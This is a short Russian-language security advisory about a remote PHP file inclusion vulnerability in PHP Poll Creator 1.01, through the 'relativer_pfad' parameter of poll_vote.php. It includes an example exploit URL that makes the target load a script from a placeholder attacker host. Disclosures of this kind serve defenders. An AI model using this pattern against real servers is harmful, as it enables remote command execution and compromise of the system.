Security Lab

PHP-инклюдинг в PHP Poll Creator

Дата публикации:30.05.2005
Всего просмотров:1405
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2006-7135
CVE-2006-7136
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PHP Poll Creator 1.x
Уязвимые версии: PHP Poll Creator 1.01

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе с привилегиями web сервера.

Уязвимость существует в сценарии 'poll_vote.php' из-за недостаточной обработки входных данных в параметре 'relativer_pfad'. Удаленный пользователю может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Пример:

http://[target]/poll_vote.php?relativer_pfad=http://[attacker]/dir/

URL производителя: www.phppc.de

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHP Injection in PHP Poll Creator